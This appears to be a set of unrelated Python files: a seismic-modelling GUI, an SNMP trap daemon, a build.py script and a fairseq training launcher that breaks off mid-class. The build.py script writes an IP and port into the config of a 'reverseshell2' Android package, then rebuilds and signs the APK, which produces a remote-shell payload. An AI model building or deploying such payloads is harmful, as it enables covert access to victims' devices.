split_rad = np.zeros(len(geo30_re))
split_z = np.zeros(len(geo30_re))
for i in range(len(geo30_re)):
if tot30[i] > tot60[i]:
split_tot[i] = (tot30[i] - tot60[i]) / tot60[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo30_re[i], tot30[i], 'g+')
self.axes_anray_tot.plot(geo30_re[i], tot60[i], 'g+')
else:
split_tot[i] = (tot60[i] - tot30[i]) / tot30[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo30_re[i], tot30[i], 'g+')
self.axes_anray_tot.plot(geo30_re[i], tot60[i], 'g+')
if abs(rad_30[i]) > abs(rad_60[i]):
split_rad[i] = (abs(rad_30[i]) - abs(rad_60[i])) / abs(rad_60[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo30_re[i], rad_30[i], 'g+')
self.axes_anray_rad.plot(geo30_re[i], rad_60[i], 'g+')
else:
split_rad[i] = (abs(rad_60[i]) - abs(rad_30[i])) / abs(rad_30[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo30_re[i], rad_30[i], 'g+')
self.axes_anray_rad.plot(geo30_re[i], rad_60[i], 'g+')
if abs(ampz_30[i]) > abs(ampz_60[i]):
split_z[i] = (abs(ampz_30[i]) - abs(ampz_60[i])) / abs(ampz_60[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo30_re[i], ampz_30[i], 'g+')
self.axes_anray_z.plot(geo30_re[i], ampz_60[i], 'g+')
else:
split_z[i] = (abs(ampz_60[i]) - abs(ampz_30[i])) / abs(ampz_30[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo30_re[i], ampz_30[i], 'g+')
self.axes_anray_z.plot(geo30_re[i], ampz_60[i], 'g+')
self.axes_anray_tot2.bar(geo30_re, split_tot, width=0.7, alpha=0.1, color='green')
self.axes_anray_rad2.bar(geo30_re, split_rad, width=0.7, alpha=0.1, color='green')
self.axes_anray_z2.bar(geo30_re, split_z, width=0.7, alpha=0.1, color='green')
if self.split_box_anray_45_90.isChecked():
split_tot = np.zeros(len(geo45_re))
split_rad = np.zeros(len(geo45_re))
split_z = np.zeros(len(geo45_re))
for i in range(len(geo45_re)):
if tot45[i] > tot90[i]:
split_tot[i] = (tot45[i] - tot90[i]) / tot90[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'y+')
self.axes_anray_tot.plot(geo45_re[i], tot90[i], 'y+')
else:
split_tot[i] = (tot90[i] - tot45[i]) / tot45[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'y+')
self.axes_anray_tot.plot(geo45_re[i], tot90[i], 'y+')
if abs(rad_45[i]) > abs(rad_90[i]):
split_rad[i] = (abs(rad_45[i]) - abs(rad_90[i])) / abs(rad_90[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'y+')
self.axes_anray_rad.plot(geo45_re[i], rad_90[i], 'y+')
else:
split_rad[i] = (abs(rad_90[i]) - abs(rad_45[i])) / abs(rad_45[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'y+')
self.axes_anray_rad.plot(geo45_re[i], rad_90[i], 'y+')
if abs(ampz_45[i]) > abs(ampz_90[i]):
split_z[i] = (abs(ampz_45[i]) - abs(ampz_90[i])) / abs(ampz_90[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'y+')
self.axes_anray_z.plot(geo45_re[i], ampz_90[i], 'y+')
else:
split_z[i] = (abs(ampz_90[i]) - abs(ampz_45[i])) / abs(ampz_45[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'y+')
self.axes_anray_z.plot(geo45_re[i], ampz_90[i], 'y+')
self.axes_anray_tot2.bar(geo45_re, split_tot, width=0.7, alpha=0.1, color='yellow')
self.axes_anray_rad2.bar(geo45_re, split_rad, width=0.7, alpha=0.1, color='yellow')
self.axes_anray_z2.bar(geo45_re, split_z, width=0.7, alpha=0.1, color='yellow')
self.canvas_anray.draw()
self.canvas_anray2.draw()
except:
self.message()
self.plot_sismograma()
#Função para atualizar e mostrar os coeficientes de reflexão quando selecionado o azimute, xv é a componente radial e zv, vertical
def plot_sismograma_v(self):
if self.radioButton_0.isChecked():
xv = self.refl_rad_0
zv = self.refl_z_0
if self.radioButton_30.isChecked():
xv = self.refl_rad_30
zv = self.refl_z_30
if self.radioButton_45.isChecked():
xv = self.refl_rad_45
zv = self.refl_z_45
if self.radioButton_60.isChecked():
xv = self.refl_rad_60
zv = self.refl_z_60
if self.radioButton_90.isChecked():
xv = self.refl_rad_90
zv = self.refl_z_90
self.label_x_max.setText(str((round(np.max(abs(xv)), 4))))
self.label_z_max.setText(str((round(np.max(abs(zv)), 4))))
#Função para plotar o sismograma
def plot_sismograma(self):
self.axes_sismo_x.cla()
self.axes_sismo_z.cla()
Tmax = self.doubleSpinBox_tmax.value()
dt = self.doubleSpinBox_dt.value()
NS = int((Tmax / dt) + 1)
t = np.arange(NS) * dt
t1 = self.time_basalto
x1 = self.spinBox_rmin.value()
dx = self.spinBox_rstep.value()
NX = self.spinBox_ngeo.value()
x = np.arange(NX) * dx + x1
normal_f = self.doubleSpinBox_normalf.value()
dados_x = np.zeros([NX, NS])
dados_z = np.zeros([NX, NS])
FREQ = self.doubleSpinBox_freq.value()
OMEGA = 2 * np.pi * FREQ
GAMA = self.doubleSpinBox_gama.value()
PSI = 0.
TSH = 0.45 * GAMA / FREQ
tw = np.arange(-TSH, TSH + dt, dt)
wr_hti = []
wz_hti = []
wr_solo = []
wz_solo = []
for i in range(0, NX):
ni = int(t1[i] / dt)
dados_x[i, ni] = 1
dados_z[i, ni] = 1
if self.checkBox_solo.isChecked():
self.frame_12.setEnabled(True)
self.checkBox_solo_sismo.setEnabled(True)
self.label_47.setEnabled(True)
t2 = self.time_solo
dados_solo_x = np.zeros([NX, NS])
dados_solo_z = np.zeros([NX, NS])
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.solo_fase_rad[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.solo_fase_z[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_solo.append(wr)
wz_solo.append(wz)
ni2 = int(t2[i] / dt)
dados_solo_x[i, ni2] = 1
dados_solo_z[i, ni2] = 1
if self.radioButton_0.isChecked():
xv = self.refl_rad_0
zv = self.refl_z_0
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_rad_0
zv2 = self.refl_solo_z_0
if self.radioButton_30.isChecked():
xv = self.refl_rad_30
zv = self.refl_z_30
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_30
zv2 = self.refl_solo_z_30
if self.radioButton_45.isChecked():
xv = self.refl_rad_45
zv = self.refl_z_45
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_45
zv2 = self.refl_solo_z_45
if self.radioButton_60.isChecked():
xv = self.refl_rad_60
zv = self.refl_z_60
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_60
zv2 = self.refl_solo_z_60
if self.radioButton_90.isChecked():
xv = self.refl_rad_90
zv = self.refl_z_90
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_90
zv2 = self.refl_solo_z_90
self.plot_sismograma_v()
fatorganhodisplay = normal_f
if self.radioButton_normx.isChecked():
fatorganhodisplay = 1/np.max(abs(xv))
if self.radioButton_normz.isChecked():
fatorganhodisplay = 1/np.max(abs(zv))
if self.radioButton_norm_def.isChecked():
fatorganhodisplay = 1/self.doubleSpinBox_normalf.value()
for i in range(dados_x.shape[0]):
wx = wr_hti[i]*xv[i]
wz = wz_hti[i]*zv[i]
dados_x[i, :] = np.convolve(dados_x[i, :], wx, mode='same')
dados_z[i, :] = np.convolve(dados_z[i, :], wz, mode='same')
if self.checkBox_solo_sismo.isChecked():
self.checkBox_solo_sismo2.setEnabled(True)
for i in range(dados_x.shape[0]):
if self.checkBox_solo_sismo2.isChecked():
if i == 0:
wx2 = wr_solo[i] * xv2[i]
wz2 = wz_solo[i] * zv2[i]
dados_solo_x[i, :] = np.convolve(dados_solo_x[i, :], wx2, mode='same')
dados_solo_z[i, :] = np.convolve(dados_solo_z[i, :], wz2, mode='same')
else:
dados_solo_x[i, :] = 0
dados_solo_z[i, :] = 0
else:
wx2 = wr_solo[i] * xv2[i]
wz2 = wz_solo[i] * zv2[i]
dados_solo_x[i, :] = np.convolve(dados_solo_x[i, :], wx2, mode='same')
dados_solo_z[i, :] = np.convolve(dados_solo_z[i, :], wz2, mode='same')
for i in range(0, NX):
data_x = x[i]+ (dados_x[i] + dados_solo_x[i]) * fatorganhodisplay
data_z = x[i] +(dados_z[i] + dados_solo_z[i]) * fatorganhodisplay
self.axes_sismo_x.plot(data_x, t, '-', color='black')
self.axes_sismo_z.plot(data_z, t, '-', color='black')
self.axes_sismo_x.fill_betweenx(t, x[i], data_x, where=(data_x > x[i]), color='black')
self.axes_sismo_z.fill_betweenx(t, x[i], data_z, where=(data_z > x[i]), color='black')
self.axes_sismo_x.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.axes_sismo_z.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
else:
for i in range(0, NX):
data_x = x[i] + dados_x[i] * fatorganhodisplay
data_z = x[i] + dados_z[i] * fatorganhodisplay
self.axes_sismo_x.plot(data_x, t, '-', color='black')
self.axes_sismo_z.plot(data_z, t, '-', color='black')
self.axes_sismo_x.fill_betweenx(t, x[i], data_x , where=(data_x > x[i]), color='black')
self.axes_sismo_z.fill_betweenx(t, x[i], data_z, where=(data_z > x[i]), color='black')
self.axes_sismo_x.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.axes_sismo_z.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.canvas_sismo.draw()
self.plot_sismo_azim()
self.az_tmax.setValue(np.max(t))
#Plota os sismogramas da mesma componente para azimutes diferentes. Normalizado de forma ao maior valor entre os dois ser igual a 1.
def plot_sismo_azim(self):
self.axes_sismo2_1.cla()
self.axes_sismo2_2.cla()
Tmax = self.doubleSpinBox_tmax.value()
dt = self.doubleSpinBox_dt.value()
NS = int((Tmax / dt) + 1)
t = np.arange(NS) * dt
t1 = self.time_basalto
x1 = self.spinBox_rmin.value()
dx = self.spinBox_rstep.value()
NX = self.spinBox_ngeo.value()
x = np.arange(NX) * dx + x1
dados_1 = np.zeros([NX, NS])
dados_2 = np.zeros([NX, NS])
w_1=[]
w_2=[]
r1 = 0
r2 = 0
try:
for i in range(0, NX):
ni = int(t1[i] / dt)
dados_1[i, ni] = 1
dados_2[i, ni] = 1
FREQ = 50
OMEGA = 2 * np.pi * FREQ
GAMA = 4.
PSI = 0.
TSH = 0.45 * GAMA / FREQ
tw = np.arange(-TSH, TSH + dt, dt)
w = np.cos(OMEGA * tw + PSI) * np.exp(-(OMEGA * tw / GAMA) ** 2)
if self.radio_sismo_0_90.isChecked():
label1 = '0'
label2 = '90'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_0
r2 = self.refl_rad_90
max_1 = np.max(abs(self.refl_rad_0))
max_2 = np.max(abs(self.refl_rad_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_0
r2 = self.refl_z_90
max_1 = np.max(abs(self.refl_z_0))
max_2 = np.max(abs(self.refl_z_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_0_45.isChecked():
label1 = '0'
label2 = '45'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_0
r2 = self.refl_rad_45
max_1 = np.max(abs(self.refl_rad_0))
max_2 = np.max(abs(self.refl_rad_45))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_0
r2 = self.refl_z_45
max_1 = np.max(abs(self.refl_z_0))
max_2 = np.max(abs(self.refl_z_45))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_30_60.isChecked():
label1 = '30'
label2 = '60'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_30
r2 = self.refl_rad_60
max_1 = np.max(abs(self.refl_rad_30))
max_2 = np.max(abs(self.refl_rad_60))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_30
r2 = self.refl_z_60
max_1 = np.max(abs(self.refl_z_30))
max_2 = np.max(abs(self.refl_z_60))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_45_90.isChecked():
label1 = '45'
label2 = '90'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_45
r2 = self.refl_rad_90
max_1 = np.max(abs(self.refl_rad_45))
max_2 = np.max(abs(self.refl_rad_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_45
r2 = self.refl_z_90
max_1 = np.max(abs(self.refl_z_45))
max_2 = np.max(abs(self.refl_z_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
for i in range(dados_1.shape[0]):
w1 = w_1[i] * r1[i]
w2 = w_2[i] * r2[i]
dados_1[i, :] = np.convolve(dados_1[i, :], w1, mode='same')
dados_2[i, :] = np.convolve(dados_2[i, :], w2, mode='same')
if max_1 > max_2:
fatorganhodisplay = 1/max_1
else:
fatorganhodisplay = 1/max_2
for i in range(0, NX):
data_1 = x[i] + dados_1[i] * fatorganhodisplay
data_2 = x[i] + dados_2[i] * fatorganhodisplay
self.axes_sismo2_1.plot(data_1, t, '-', color='black')
self.axes_sismo2_1.set_title('azimute %s' %label1)
self.axes_sismo2_1.set_ylabel('Tempo (s)')
self.axes_sismo2_1.set_xlabel('Distância (m)')
self.axes_sismo2_1.fill_betweenx(t, x[i], data_1 , where=(data_1 > x[i]), color='black')
self.axes_sismo2_2.plot(data_2, t, '-', color='black')
self.axes_sismo2_2.set_title('azimute %s' %label2)
self.axes_sismo2_2.set_ylabel('Tempo (s)')
self.axes_sismo2_2.set_xlabel('Distância (m)')
self.axes_sismo2_2.fill_betweenx(t, x[i], data_2, where=(data_2 > x[i]), color='black')
self.axes_sismo2_1.set_ylim([self.az_tmax.value(), self.az_tmin.value()])
self.axes_sismo2_2.set_ylim([self.az_tmax.value(), self.az_tmin.value()])
self.canvas_sismo2.draw()
except:
self.message()
def sismo_enable(self):
if self.checkBox_solo_sismo.isChecked():
self.checkBox_solo_sismo2.setEnabled(True)
else:
self.checkBox_solo_sismo2.setEnabled(False)
# Função que converte a distancia dos geofones para ângulo (1 camada)
def geofone_to_angle(self, number, rmin, rstep, prof):
a = []
for i in range(number):
if i == 0:
a.append(rmin)
dist = rmin
else:
dist = dist + rstep
a.append(dist)
array = np.asarray(a)
angles = np.degrees(np.arctan((array / 2) / prof))
return angles, a
# Função que converte a distancia dos geofones para ângulo (2 camadas),
# v1 = velocidade no solo, v2= velocidade na camada 1
# p1=espessura do solo, p2=espessura da 1 camada
def geofone_to_angle_2(self, number, rmin, rstep, v1, v2, p1, p2):
li = []
for i in range(number):
if i == 0:
li.append(rmin)
dist = rmin
else:
dist = dist + rstep
li.append(dist)
arr = np.asarray(li)
a = v1 ** 2 - v2 ** 2
z = arr / 2
b = 2 * z * a
c = a * (z ** 2) - (v2 ** 2) * (p2 ** 2) + (v1 ** 2) * (p1 ** 2)
d = 2 * z * ((v2 ** 2) * (p2 ** 2))
e = (v1 ** 2) * (p1 ** 2) - (v2 ** 2) * (p2 ** 2) * (z ** 2)
p = [a, -b, c, d, e]
j = []
for i in range(len(li)):
vlist = list()
v = roots(a * x ** 4 - b[i] * x ** 3 + c[i] * x ** 2 + d[i] * x + e[i], x)
for po in v.keys():
if "I" not in str(po) and po > 0 and po < arr[i]:
vlist.append(po)
j.append(float(vlist[0]))
m = np.asarray(j)
tt = np.arctan(m / p2)
angles = np.degrees(tt)
#Analise dos angulos. Para verificar os angulos basta descomentar as linhas seguintes
# inc = (v1/v2)*np.sin(tt)
# angles_inc = np.arcsin(inc)
# angles_inc_degree = np.degrees(angles_inc)
# print('angulos de transmissao', angles)
# print('angulos de incidencia', angles_inc_degree)
# ang_critico2 = np.arcsin(v1/ v2)
# ang_critico_graus2 = ang_critico2 * 180 / np.pi
# print('angulo critico=', ang_critico_graus2)
return angles
def reflect_travel_time(self, nlayer, thick1, i_l1,v1, thick2, i_l2, v2):
geo = []
if nlayer == 1:
for i in range(len(i_l1)):
geo.append(i + 1)
d = thick1/np.cos(i_l1*np.pi/180)
t = 2*d/v1
if nlayer == 2:
for i in range(len(i_l2)):
geo.append(i + 1)
d2= thick2/np.cos(i_l2*np.pi/180)
t2 = 2 * d2 / v2
theta1 = np.arcsin((v1/v2)*np.sin(i_l2*np.pi/180))
d1 = thick1 / np.cos(theta1)
t1=2*d1/v1
t = t1+t2
return(geo, t)
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QMainWindow()
prog = MyFirstGuiProgram(dialog)
dialog.show()
sys.exit(app.exec_())
|
trapd.py
|
'''
Created on Nov. 06, 2014
@author: yunli
'''
from pysnmp.carrier.asynsock.dispatch import AsynsockDispatcher
from pysnmp.carrier.asynsock.dgram import udp
from pyasn1.codec.ber import decoder
from pysnmp.proto import api
from threading import Thread, Event
import logging
import util
import signal
import sys
import subprocess
import concurrent.futures
from devicePlugin import TwoStageConfigurator
from propLoader import OpenClosProperty, loadLoggingConfig
from exception import TrapDaemonError
moduleName = 'trapd'
loadLoggingConfig(appName = moduleName)
logger = logging.getLogger(moduleName)
DEFAULT_HOST = "0.0.0.0"
DEFAULT_PORT = 20162
DEFAULT_MAX_THREADS = 10
trapReceiver = None
def onTrap(transportDispatcher, transportDomain, transportAddress, wholeMsg):
# don't even log the trap PDU unless we are at DEBUG level
if logger.isEnabledFor(logging.DEBUG):
while wholeMsg:
msgVer = int(api.decodeMessageVersion(wholeMsg))
if msgVer in api.protoModules:
pMod = api.protoModules[msgVer]
else:
logger.error('Unsupported SNMP version %s' % msgVer)
return
reqMsg, wholeMsg = decoder.decode(
wholeMsg, asn1Spec=pMod.Message(),
)
logger.info('Notification message from %s:%s ' % (
transportAddress[0], transportAddress[1]
)
)
reqPDU = pMod.apiMessage.getPDU(reqMsg)
if reqPDU.isSameTypeWith(pMod.TrapPDU()):
if msgVer == api.protoVersion1:
logger.debug('Enterprise: %s' % (
pMod.apiTrapPDU.getEnterprise(reqPDU).prettyPrint()
)
)
logger.debug('Agent Address: %s' % (
pMod.apiTrapPDU.getAgentAddr(reqPDU).prettyPrint()
)
)
logger.debug('Generic Trap: %s' % (
pMod.apiTrapPDU.getGenericTrap(reqPDU).prettyPrint()
)
)
logger.debug('Specific Trap: %s' % (
pMod.apiTrapPDU.getSpecificTrap(reqPDU).prettyPrint()
)
)
logger.debug('Uptime: %s' % (
pMod.apiTrapPDU.getTimeStamp(reqPDU).prettyPrint()
)
)
varBinds = pMod.apiTrapPDU.getVarBindList(reqPDU)
else:
varBinds = pMod.apiPDU.getVarBindList(reqPDU)
logger.debug('Var-binds:')
for oid, val in varBinds:
logger.debug('%s = %s' % (oid.prettyPrint(), val.prettyPrint()))
# start the 2-stage configuration in a separate thread
if trapReceiver is not None:
# execute 2-stage configuration callback if there is one configured in openclos.yaml
callback = trapReceiver.twoStageConfigurationCallback
if callback is not None and len(callback) > 0:
proc = subprocess.Popen(callback, shell=True)
returnValue = proc.wait()
if returnValue != 0:
# 2-stage configuration callback returns non-zero value indicating we SHOULD NOT continue
logger.debug('twoStageConfigurationCallback "%s" returns %d, trap ignored' % (callback, returnValue))
return
configurator = TwoStageConfigurator(deviceIp=transportAddress[0], stopEvent=trapReceiver.stopEvent)
trapReceiver.executor.submit(configurator.start2StageConfiguration)
class TrapReceiver():
def __init__(self, conf = {}):
if conf is None or any(conf) == False:
self.__conf = OpenClosProperty(appName = moduleName).getProperties()
else:
self.__conf = conf
# default value
self.target = DEFAULT_HOST
self.port = DEFAULT_PORT
# validate required parameter
if 'snmpTrap' in self.__conf and 'openclos_trap_group' in self.__conf['snmpTrap'] and 'target' in self.__conf['snmpTrap']['openclos_trap_group']:
self.target = self.__conf['snmpTrap']['openclos_trap_group']['target']
else:
logger.info("snmpTrap:openclos_trap_group:target is missing from configuration. using %s" % (self.target))
if 'snmpTrap' in self.__conf and 'openclos_trap_group' in self.__conf['snmpTrap'] and 'port' in self.__conf['snmpTrap']['openclos_trap_group']:
self.port = int(self.__conf['snmpTrap']['openclos_trap_group']['port'])
else:
logger.info("snmpTrap:openclos_trap_group:port is missing from configuration. using %d" % (self.port))
if 'snmpTrap' in self.__conf and 'threadCount' in self.__conf['snmpTrap']:
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers = self.__conf['snmpTrap']['threadCount'])
else:
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers = DEFAULT_MAX_THREADS)
# event to stop from sleep
self.stopEvent = Event()
self.twoStageConfigurationCallback = util.getTwoStageConfigurationCallback(self.__conf)
def threadFunction(self):
self.transportDispatcher = AsynsockDispatcher()
self.transportDispatcher.registerRecvCbFun(onTrap)
# UDP/IPv4
self.transportDispatcher.registerTransport(
udp.domainName, udp.UdpSocketTransport().openServerMode((self.target, self.port))
)
self.transportDispatcher.jobStarted(1)
try:
# Dispatcher will never finish as job#1 never reaches zero
self.transportDispatcher.runDispatcher()
except Exception as exc:
logger.error("Encounted error '%s' on trap receiver %s:%d" % (exc, self.target, self.port))
self.transportDispatcher.closeDispatcher()
raise TrapDaemonError("Trap receiver %s:%d" % (self.target, self.port), exc)
else:
self.transportDispatcher.closeDispatcher()
def start(self):
logger.info("Starting trap receiver...")
self.thread = Thread(target=self.threadFunction, args=())
self.thread.start()
logger.info("Trap receiver started on %s:%d" % (self.target, self.port))
def stop(self):
logger.info("Stopping trap receiver...")
self.stopEvent.set()
self.executor.shutdown()
self.transportDispatcher.jobFinished(1)
self.thread.join()
logger.info("Trap receiver stopped")
def trap_receiver_signal_handler(signal, frame):
logger.debug("received signal %d" % signal)
trapReceiver.stop()
sys.exit(0)
def main():
signal.signal(signal.SIGINT, trap_receiver_signal_handler)
signal.signal(signal.SIGTERM, trap_receiver_signal_handler)
global trapReceiver
trapReceiver = TrapReceiver()
trapReceiver.start()
# Note we have to do this in order for signal to be properly caught by main thread
# We need to do the similar thing when we integrate this into sampleApplication.py
while True:
signal.pause()
if __name__ == '__main__':
main()
|
build.py
|
import sys
import threading
from colorama import Fore, Style,init
from utils import *
def animate(message):
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
print("\r"+Style.BRIGHT+Fore.GREEN+message+c+Fore.RESET, end="")
time.sleep(0.1)
def build(direc, port1, ip, args):
""" print("Datos de funcion")
print(direc)
print(port)
print(ip) """
#Preparamos la ruta
editor = "Compiled_apk_files"+direc+"smali"+direc+"com"+direc+"example"+direc+"reverseshell2"+direc+"config.smali"
""" print("Se muestra editor")
print(editor) """
port = str(port1)
#print(port)
try:
#se pone en modo lectura una linea en especifico
file = open(editor,"r").readlines()
file[16]=file[16][:21]+"\""+ip+"\""+"\n"
file[21]=file[21][:21]+"\""+port+"\""+"\n"
str_file="".join([str(elem) for elem in file])
#se pone en modo escritura una linea en especifico
open(editor,"w").write(str_file)
except Exception as e:
sys.exit()
#se verifica que se tenga instalada java
java_version = executeCMD("java -version")
if java_version.stderr == "":
print(Style.BRIGHT+Fore.RED+"\nJava Not Installed"+Fore.RESET)
else:
print(Style.BRIGHT+Fore.YELLOW+"\nGenerating apk file"+Fore.RESET)
#iniciamos la generacion de la apk
if args.output:
#extraemos de los argumentos el nombre del output
outFileName = args.output
else:
#le damos un nombre por default
outFileName = "test.apk"
done=False
# Creamos un subproceso usando hilos
#t = threading.Thread(target=animate,args=("Building ",))
#Se inicia los hilos
#t.start()
#se ejecuta el comando para crear la apk
resOut = executeCMD("java -jar Jar_Files/apktool.jar b Compiled_apk_files -o "+outFileName)
done = True
#t.join()
if not resOut.returncode:
print(Style.BRIGHT+Fore.GREEN+"\rSuccessfully apk built "+getpwd(outFileName)+"\n"+Fore.RESET,end="")
print(Style.BRIGHT+Fore.YELLOW+"\nSigning the apk"+Fore.RESET)
done=False
#muestra animacion de carga mientras se ejecuta el hilo
#t = threading.Thread(target=animate,args=("Signing ",))
#t.start()
#Ejecutamos el comando de registro de la apk previa
resOut = executeCMD("java -jar Jar_Files/sign.jar "+outFileName+" --override")
done = True
#t.join()
#se espera un resultado del hilo
if not resOut.returncode:
print(Fore.GREEN+"\rSuccessfully signed the apk "+outFileName+Fore.RESET,end="")
print(" ")
else:
print("\r"+resOut.stderr)
print(Fore.RED+"Signing Failed"+Fore.RESET)
else:
print("\r"+resOut.stderr)
print(Fore.RED+"Building Failed"+Fore.RESET)
|
multiprocessing_train.py
|
#!/usr/bin/env python3 -u
import os
import random
import signal
import torch
from fairseq import distributed_utils, options
from train import main as single_process_main
def main(args):
# Set distributed training parameters for a single node.
if not args.distributed_world_size:
args.distributed_world_size = torch.cuda.device_count()
port = random.randint(10000, 20000)
args.distributed_init_method = 'tcp://localhost:{port}'.format(port=port)
args.distributed_init_host = 'localhost'
args.distributed_port = port + 1
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(args.distributed_world_size):
args.distributed_rank = i
args.device_id = i
procs.append(mp.Process(target=run, args=(args, error_queue), daemon=True))
procs[i].start()
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, error_queue):
try:
args.distributed_rank = distributed_utils.distributed_init(args)
single_process_main(args)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.distributed_rank, traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
